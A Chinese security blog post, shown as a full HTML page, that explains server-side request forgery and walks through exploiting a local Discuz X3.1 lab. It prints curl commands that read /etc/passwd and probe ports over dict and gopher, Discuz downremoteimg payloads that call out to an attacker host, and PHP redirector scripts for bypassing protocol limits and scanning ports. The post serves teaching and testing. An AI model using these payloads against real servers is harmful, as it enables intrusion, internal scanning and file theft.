<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.png?v=5.1.4">


  <link rel="mask-icon" href="/images/favicon.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ssrf,">





  <link rel="alternate" href="/stom.xml" title="Goudan's blog" type="application/atom+xml">






<meta name="description" content="SSRF攻击原理SSRF（Server-Side Request Forgery，服务器端请求伪造）是一种由攻击者构造请求，利用服务器端发起的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统（正因为请求是由服务器端发起的，所以服务器能请求到与自身相连而外网隔离的内部系统）。">
<meta name="keywords" content="ssrf">
<meta property="og:type" content="article">
<meta property="og:title" content="SSRF漏洞总结及实战">
<meta property="og:url" content="http://goudanjun.vip/2021/01/09/ssrf漏洞总结及实战.html/index.html">
<meta property="og:site_name" content="Goudan&#39;s blog">
<meta property="og:description" content="SSRF攻击原理SSRF（Server-Side Request Forgery，服务器端请求伪造）是一种由攻击者构造请求，利用服务器端发起的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统（正因为请求是由服务器端发起的，所以服务器能请求到与自身相连而外网隔离的内部系统）。">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.loli.net/2021/01/09/BXCedG2Dlz6EaKt.jpg">
<meta property="og:image" content="https://i.loli.net/2021/01/09/pd5fo1PDSFkNVr7.jpg">
<meta property="og:image" content="https://i.loli.net/2021/01/09/RJFnikj9Apb2ON5.jpg">
<meta property="og:image" content="https://i.loli.net/2021/01/09/6IaAdCSbDcMF3Ko.jpg">
<meta property="og:image" content="https://i.loli.net/2021/01/09/AHjnXzGoZQvrxSt.jpg">
<meta property="og:image" content="https://i.loli.net/2021/01/09/mu8nMTFzNafhZPs.jpg">
<meta property="og:image" content="https://i.loli.net/2021/01/09/rRWweQIZ6nkbhsH.jpg">
<meta property="og:image" content="https://i.loli.net/2021/01/09/TsdaMScUHOzGLmn.jpg">
<meta property="og:image" content="https://i.loli.net/2021/01/09/PWD5LF8dTyg9uia.png">
<meta property="og:image" content="https://i.loli.net/2021/01/09/VDqtLxAl2iFd9gC.png">
<meta property="og:image" content="https://i.loli.net/2021/01/09/uFWw4Uc2okJaIlv.png">
<meta property="og:image" content="https://i.loli.net/2021/01/09/BhK9NzIPZpf8Xie.png">
<meta property="og:image" content="https://i.loli.net/2021/01/09/2I4xhV5Qgudn6PF.png">
<meta property="og:image" content="https://i.loli.net/2021/01/09/fJyFN4GwZA78SR1.png">
<meta property="og:image" content="https://i.loli.net/2021/01/09/ZOfyAEYqIhPFxsi.png">
<meta property="og:image" content="https://i.loli.net/2021/01/09/H4JgAXPjwrC7zh2.png">
<meta property="og:image" content="https://i.loli.net/2021/01/09/v59Yh8l1fD4RuPS.png">
<meta property="og:updated_time" content="2021-01-12T06:39:46.608Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SSRF漏洞总结及实战">
<meta name="twitter:description" content="SSRF攻击原理SSRF（Server-Side Request Forgery，服务器端请求伪造）是一种由攻击者构造请求，利用服务器端发起的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统（正因为请求是由服务器端发起的，所以服务器能请求到与自身相连而外网隔离的内部系统）。">
<meta name="twitter:image" content="https://i.loli.net/2021/01/09/BXCedG2Dlz6EaKt.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"right","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://goudanjun.vip/2021/01/09/ssrf漏洞总结及实战.html/">





  <title>SSRF漏洞总结及实战 | Goudan's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Goudan's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-xssplatform">
          <a href="http://j36f673471.zicp.vip/xssme/index.php" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-XSSPlatform"></i> <br>
            
            XSSPlatform
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://goudanjun.vip/2021/01/09/ssrf漏洞总结及实战.html/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="狗蛋菌">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Goudan's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SSRF漏洞总结及实战</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-01-09T12:47:28+08:00">
                2021-01-09
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  940 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  3 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="SSRF攻击原理"><a href="#SSRF攻击原理" class="headerlink" title="SSRF攻击原理"></a><strong>SSRF攻击原理</strong></h2><p>SSRF（Server-Side Request Forgery，服务器端请求伪造）是一种由攻击者构造请求，利用服务器端发起的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统（正因为请求是由服务器端发起的，所以服务器能请求到与自身相连而外网隔离的内部系统）。</p>
<a id="more"></a>

<h3 id="Example："><a href="#Example：" class="headerlink" title="Example："></a>Example：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">GET /index.php?url=http://google.com/ HTTP/1.1</span><br><span class="line"></span><br><span class="line">Host: example.com</span><br></pre></td></tr></table></figure>

<p>在这里，<a href="http://example.com从它的服务器获取http://google.com" target="_blank" rel="noopener">http://example.com从它的服务器获取http://google.com</a></p>
<p><img src="https://i.loli.net/2021/01/09/BXCedG2Dlz6EaKt.jpg" alt="v2-e92913401482f654b988eab6e46c9c99_720w"></p>
<h2 id="SSRF的类型"><a href="#SSRF的类型" class="headerlink" title="SSRF的类型"></a>SSRF的类型</h2><ol>
<li><p>显示攻击者的响应（Basic）</p>
</li>
<li><p>不显示响应（Blind）</p>
</li>
</ol>
<h2 id="什么地方最容易出现SSRF"><a href="#什么地方最容易出现SSRF" class="headerlink" title="什么地方最容易出现SSRF"></a>什么地方最容易出现SSRF</h2><ol>
<li>云服务器商。(各种网站数据库操作)</li>
<li>有远程图片加载的地方。(编辑器之类的有远程图片加载啊)</li>
<li>网站采集、网页抓取的地方。(很多网站会有新闻采集输入url然后一键采集)</li>
<li>头像的地方。(某易就喜欢远程加载头像，例如:<a href="http://www.xxxx.com/image?url=http://www.image.com/1.jpg" target="_blank" rel="noopener">http://www.xxxx.com/image?url=http://www.image.com/1.jpg</a>)</li>
<li>最后一个一切要你输入网址的地方和可以输入ip的都放，都是ssrf的天下。</li>
</ol>
<h2 id="SSRF漏洞的危害"><a href="#SSRF漏洞的危害" class="headerlink" title="SSRF漏洞的危害"></a><strong>SSRF</strong>漏洞的危害</h2><ol>
<li>对服务器所在的内网进行端口扫描，获取一些服务的banner信息等</li>
<li>攻击运行在内网或者本地的应用程序</li>
<li>对内网WEB应用进行指纹识别，通过访问默认文件实现（Readme等文件）</li>
<li>攻击内外网的WEB应用，主要是GET就可以实现的攻击（比如Struts2，SQL注入等）</li>
<li>下载内网资源（利用file协议读取本地文件等）</li>
<li>利用Redis未授权访问，HTTP CRLF注入达到getshell</li>
<li>wooyun峰会猪猪侠的ppt</li>
<li>进行跳板</li>
<li>无视cdn</li>
</ol>
<h2 id="SSRF神器Curl的使用"><a href="#SSRF神器Curl的使用" class="headerlink" title="SSRF神器Curl的使用"></a><strong>SSRF神器Curl的使用</strong></h2><p>查看curl支持的协议列表 #curl–config –protocols</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#使用curl读取文件</span></span><br><span class="line">curl -v <span class="string">"file:///etc/passwd"</span></span><br><span class="line"><span class="comment">#使用ftp协议</span></span><br><span class="line">curl -v <span class="string">"ftp://127.0.0.1:6666/info"</span></span><br><span class="line"><span class="comment">#使用dict协议</span></span><br><span class="line">curl -v <span class="string">"dict://127.0.0.1:6666/info"</span></span><br><span class="line"><span class="comment">#使用gopher协议</span></span><br><span class="line">curl -v <span class="string">"gopher://127.0.0.1:6666/_info"</span></span><br></pre></td></tr></table></figure>

<h2 id="最常用的跳转绕过"><a href="#最常用的跳转绕过" class="headerlink" title="最常用的跳转绕过"></a>最常用的跳转绕过</h2><p>一些服务器可能限定了只能使用http和https，这样就可以通过header跳转绕过</p>
<p><img src="https://i.loli.net/2021/01/09/pd5fo1PDSFkNVr7.jpg" alt="v2-71bcbdbcb44534474a386c2f4479c8b2_720w"></p>
<h2 id="Python-SSRF实现端口扫描"><a href="#Python-SSRF实现端口扫描" class="headerlink" title="Python+SSRF实现端口扫描"></a><strong>Python+SSRF实现端口扫描</strong></h2><p>简单的端口扫描</p>
<p><img src="https://i.loli.net/2021/01/09/RJFnikj9Apb2ON5.jpg" alt="2"></p>
<p>同时观察Wireshark整个扫描流程</p>
<p><img src="https://i.loli.net/2021/01/09/6IaAdCSbDcMF3Ko.jpg" alt="3"></p>
<p>代码实现：</p>
<p><img src="https://i.loli.net/2021/01/09/AHjnXzGoZQvrxSt.jpg" alt="4"></p>
<p>验证本地是否开启了相应的端口</p>
<p><img src="https://i.loli.net/2021/01/09/mu8nMTFzNafhZPs.jpg" alt="5"></p>
<p>Python代码编写的思路：</p>
<p>端口存在连接会一直在连接，连接时间会很长。</p>
<p><img src="https://i.loli.net/2021/01/09/rRWweQIZ6nkbhsH.jpg" alt="6"></p>
<p>端口不存在的连接会被立马刷新</p>
<p><img src="https://i.loli.net/2021/01/09/TsdaMScUHOzGLmn.jpg" alt="7"></p>
<h2 id="SSRF实战"><a href="#SSRF实战" class="headerlink" title="SSRF实战"></a>SSRF实战</h2><p>环境：win10（Discuz! X3.1），kali（nc监听；IP：192.168.239.134）</p>
<p>Discuz下载地址：[Discuz!]:<a href="https://www.discuz.net/thread-3457145-1-1.html" target="_blank" rel="noopener">https://www.discuz.net/thread-3457145-1-1.html</a></p>
<p><img src="https://i.loli.net/2021/01/09/PWD5LF8dTyg9uia.png" alt="1"></p>
<ol>
<li><h3 id="在kali上监听-6666-端口"><a href="#在kali上监听-6666-端口" class="headerlink" title="在kali上监听 6666 端口"></a>在kali上监听 6666 端口</h3><p><img src="https://i.loli.net/2021/01/09/VDqtLxAl2iFd9gC.png" alt="2"></p>
<p><img src="https://i.loli.net/2021/01/09/uFWw4Uc2okJaIlv.png" alt="微信截图_20210109192239"></p>
</li>
<li><h3 id="利用Discuz-3-1的ssrf漏洞进行请求访问"><a href="#利用Discuz-3-1的ssrf漏洞进行请求访问" class="headerlink" title="利用Discuz 3.1的ssrf漏洞进行请求访问"></a>利用Discuz 3.1的ssrf漏洞进行请求访问</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/discuz/forum.php</span><br><span class="line">?mod=ajax</span><br><span class="line">&amp;action=downremoteimg</span><br><span class="line">&amp;message=[img]http://192.168.3.26:6666/?data=hello.jpg[/img]</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/01/09/BhK9NzIPZpf8Xie.png" alt="3"></p>
</li>
<li><h3 id="可以看出在kali上监听到了本机发来的get请求"><a href="#可以看出在kali上监听到了本机发来的get请求" class="headerlink" title="可以看出在kali上监听到了本机发来的get请求"></a>可以看出在kali上监听到了本机发来的get请求</h3><p><img src="https://i.loli.net/2021/01/09/2I4xhV5Qgudn6PF.png" alt="4"></p>
<h3 id="绕过header限制"><a href="#绕过header限制" class="headerlink" title="绕过header限制"></a>绕过header限制</h3><p>很多网站不允许使用ftp dict gopher协议去请求的，所以需要php函数 header来绕过</p>
<p>在公网的服务器上建立一个 dict.php 文件，写入如下内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> header(<span class="string">"location: dict://192.168.136.133:6666/info"</span>); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/01/09/fJyFN4GwZA78SR1.png" alt="微信截图_20210109202024"></p>
<p>在discuz中构造如下payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/discuz/forum.php</span><br><span class="line">?mod=ajax</span><br><span class="line">&amp;action=downremoteimg</span><br><span class="line">&amp;message=[img]http://192.168.239.137/dict.php?data=hello.jpg[/img]</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/01/09/ZOfyAEYqIhPFxsi.png" alt="微信截图_20210109202101"></p>
<p>回到kali中查看结果，成功接收到了请求info，成功利用header绕过限制，其他协议的绕过，改我们创建的php文件中的协议名称即可</p>
<p><img src="https://i.loli.net/2021/01/09/H4JgAXPjwrC7zh2.png" alt="微信截图_20210109202140"></p>
</li>
</ol>
<h3 id="探测端口"><a href="#探测端口" class="headerlink" title="探测端口"></a>探测端口</h3><p>在公网服务器上创建 port.php 内容如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">$ip = $_GET[<span class="string">'ip'</span>]; </span><br><span class="line">$port = $_GET[<span class="string">'port'</span>]; </span><br><span class="line">$scheme = $_GET[<span class="string">'s'</span>]; </span><br><span class="line">$data = $_GET[<span class="string">'data'</span>]; </span><br><span class="line">header(<span class="string">"Location: $scheme://$ip:$port:$data"</span>); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>构造如下payload</p>
<p><img src="https://i.loli.net/2021/01/09/v59Yh8l1fD4RuPS.png" alt="微信截图_20210109202539"></p>
<p>如果加载的时间很长，说明该端口是开放的。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ssrf/" rel="tag"># ssrf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/11/内网学习记录.html/" rel="next" title="内网学习记录">
                <i class="fa fa-chevron-left"></i> 内网学习记录
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/01/10/XSS漏洞总结及实战.html/" rel="prev" title="XSS漏洞总结及实战">
                XSS漏洞总结及实战 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">狗蛋菌</p>
              <p class="site-description motion-element" itemprop="description">Stay Hungry,Stay Foolish</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/stom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/goudanjun" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#SSRF攻击原理"><span class="nav-number">1.</span> <span class="nav-text">SSRF攻击原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Example："><span class="nav-number">1.1.</span> <span class="nav-text">Example：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSRF的类型"><span class="nav-number">2.</span> <span class="nav-text">SSRF的类型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#什么地方最容易出现SSRF"><span class="nav-number">3.</span> <span class="nav-text">什么地方最容易出现SSRF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSRF漏洞的危害"><span class="nav-number">4.</span> <span class="nav-text">SSRF漏洞的危害</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSRF神器Curl的使用"><span class="nav-number">5.</span> <span class="nav-text">SSRF神器Curl的使用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#最常用的跳转绕过"><span class="nav-number">6.</span> <span class="nav-text">最常用的跳转绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Python-SSRF实现端口扫描"><span class="nav-number">7.</span> <span class="nav-text">Python+SSRF实现端口扫描</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSRF实战"><span class="nav-number">8.</span> <span class="nav-text">SSRF实战</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#在kali上监听-6666-端口"><span class="nav-number">8.1.</span> <span class="nav-text">在kali上监听 6666 端口</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用Discuz-3-1的ssrf漏洞进行请求访问"><span class="nav-number">8.2.</span> <span class="nav-text">利用Discuz 3.1的ssrf漏洞进行请求访问</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#可以看出在kali上监听到了本机发来的get请求"><span class="nav-number">8.3.</span> <span class="nav-text">可以看出在kali上监听到了本机发来的get请求</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过header限制"><span class="nav-number">8.4.</span> <span class="nav-text">绕过header限制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#探测端口"><span class="nav-number">8.5.</span> <span class="nav-text">探测端口</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2019 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">狗蛋菌</span>

  
</div>





 



 




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  



  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
